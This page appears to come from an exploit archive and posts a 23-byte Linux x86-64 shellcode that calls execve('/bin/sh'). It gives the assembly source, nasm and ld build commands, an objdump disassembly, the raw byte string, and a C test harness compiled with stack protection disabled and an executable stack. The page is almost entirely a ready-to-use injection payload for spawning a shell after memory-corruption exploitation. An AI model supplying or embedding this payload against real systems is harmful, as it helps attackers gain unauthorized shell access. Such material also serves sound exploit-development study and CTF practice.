Linux/x64 execve(/bin/sh) shellcode (23 bytes) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-05-23 | Type : shellcode | Platform : linux_x86-64


[+] Code ...

/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - execve /bin/sh
;Author: rajvardhan
;Date: 23/05/2019
;Architecture: Linux x86_64
;Possibly The Smallest And Fully Reliable Shellcode

===========
Asm Source
===========

global _start
section .text
_start:
xor rsi,rsi
push rsi
mov rdi,0x68732f2f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
cdq
syscall
================================
Instruction for nasm compliation
================================

nasm -f elf64 shellcode.asm -o shellcode.o
ld shellcode.o -o shellcode

===================
objdump disassembly
===================

Disassembly of section .text:

0000000000401000 <_start>:
401000: 48 31 f6 xor %rsi,%rsi
401003: 56 push %rsi
401004: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi
40100b: 2f 73 68
40100e: 57 push %rdi
40100f: 54 push %rsp
401010: 5f pop %rdi
401011: 6a 3b pushq $0x3b
401013: 58 pop %rax
401014: 99 cltd
401015: 0f 05 syscall

==================
23 Bytes Shellcode
==================

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

======================
C Compilation And Test
======================

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

*/

#include <stdio.h>

unsigned char shellcode[] = \
"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}